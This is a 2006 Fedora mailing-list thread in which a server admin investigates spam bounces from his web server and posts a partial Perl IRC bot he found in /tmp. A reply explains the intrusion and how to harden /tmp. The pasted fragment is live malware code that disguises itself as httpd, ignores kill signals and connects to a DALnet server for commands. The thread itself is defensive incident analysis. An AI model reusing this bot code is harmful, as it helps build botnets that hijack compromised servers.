-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tue, 23 May 2006 13:11:46 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote: > CodeHeads wrote: > >> There is something wrong but I cannot nail it down. > >> > >> I am receiving hundreds of bounce backs from the web server I am running. > >> Not sure how they are sending mail. The only mail that should be sent is > >> from forms. Here is a header of one of queues. Maybe someone has run > >> into this. > >> > >> V8 > >> T1147739033 > >> K1147739138 > >> N1 > >> P34672 > >> Mhost map: lookup (zdnetmail.com): deferred > >> F8bs > >> $_apache@localhost > >> ${daemon_flags}c u > >> Sapache > >> Aapache@xxxxxxxxxxxxxx > >> rRFC822; galactica7@xxxxxxxxxxxxx > >> RPFD:galactica7@xxxxxxxxxxxxx > >> H?P?Return-Path: <<81>g> > >> H??Received: (from apache@localhost) > >> by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524; > >> Mon, 15 May 2006 20:23:53 -0400 > >> H?D?Date: Mon, 15 May 2006 20:23:53 -0400 > >> H?x?Full-Name: Apache > >> H?M?Message-Id: <200605160023.k4G0NrpQ017524@xxxxxxxxxxxxxx> > >> H??To: galactica7@xxxxxxxxxxxxx > >> H??Subject: WINNING NOTIFICATION > >> H??From: NATIONAL LOTTERY <claimsagent_2006_2007@xxxxxxxxxxx> > >> > >> What is bothering me is this: > >> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524; > > Right, that should tell you that the mail headers you are looking at > seem to be generated by something running as user apache (probably a > CGI/PHP script of some kind running via your web server), which is > calling the local sendmail on that server to send the mail out. It's > nothing to do with postfix at all. > > > Sorry again, but looky what I found in the /tmp dir: > > The whole thing is not copy and pasted: > > #!/usr/bin/perl > > # r00t teh pl4net! gr33t t0 Myhack@DALnet > > # ------[eof]----- > > > > > > > > system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print > > $1;}'`"); > > > > > > my $processo = 'httpd'; > > > > # morgan the code that you need to rip ends here > > > > my @titi = ("Cube-|"); > > > > my $sleep='5'; > > my $linas_max='4'; > > my @adms=("apaii","KingFighter"); > > my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209"); > > my @canais=("#conn"); > > my $nick= $titi[rand scalar @titi]; > > my $ircname = $titi[rand scalar @titi]; > > chop (my $realname = $titi[rand scalar @titi]); > > > > $servidor='rumble.dal.net' unless $servidor; > > my $porta='6667'; > > my $VERSAO = '0.5'; > > $SIG{'INT'} = 'IGNORE'; > > $SIG{'HUP'} = 'IGNORE'; > > $SIG{'TERM'} = 'IGNORE'; > > $SIG{'CHLD'} = 'IGNORE'; > > $SIG{'PS'} = 'IGNORE'; > > use IO::Socket; > > use Socket; > > use IO::Select; > > chdir("/"); > > $servidor="$ARGV[0]" if $ARGV[0]; > > $0="$processo"."\0"x16;; > > my $pid=fork; > > exit if $pid; > > die "Problema com o fork: $!" unless defined($pid); > > > > our %irc_servers; > > our %DCC; > > my $dcc_sel = new IO::Select->new(); > > > > $sel_cliente = IO::Select->new(); > > sub sendraw { > > if ($#_ == '1') { > > my $socket = $_[0]; > > print $socket "$_[1]\n"; > > } else { > > print $IRC_cur_socket "$_[0]\n"; > > } > > } > > > > sub conectar { > > my $meunick = $_[0]; > > my $servidor_con = $_[1]; > > my $porta_con = $_[2]; > > > > my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", > > PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if > > (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; > > > > What I cannot understand is how someone can upload to the tmp dir. I guess > > I am still learning. Can someone shed some light on this? > > This is communicating with an IRC server, probably to listen for commands. > > Look at the owner of the script. If it's apache, you can safely say that > a webserver exploit was used to upload it. You could try looking at the > timestamp of the file, and look in your web server log files for > suspicious activity at around that time to get a clue as to how it got > there. > > If you have /tmp on a separate partition, I'd seriously consider > mounting it noexec,nodev. If it's not a separate partition, I'd > seriously consider making one for it on an Internet-exposed web server. > Same goes for /var. > > Paul. > That has since been removed and the system re done. I have been keeping an eye on /tmp and /var/tmp. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEczbFfw3TK8jhZrsRAhN/AKDjZlDh+0bV++6XvBfWHBOVTZdIQQCgoVGJ Unhz/IKmEViCNj3G+YzEZdk= =T6xG -----END PGP SIGNATURE----- -- fedora-list mailing list fedora-list@xxxxxxxxxx To unsubscribe: https://www.redhat.com/mailman/listinfo/fedora-list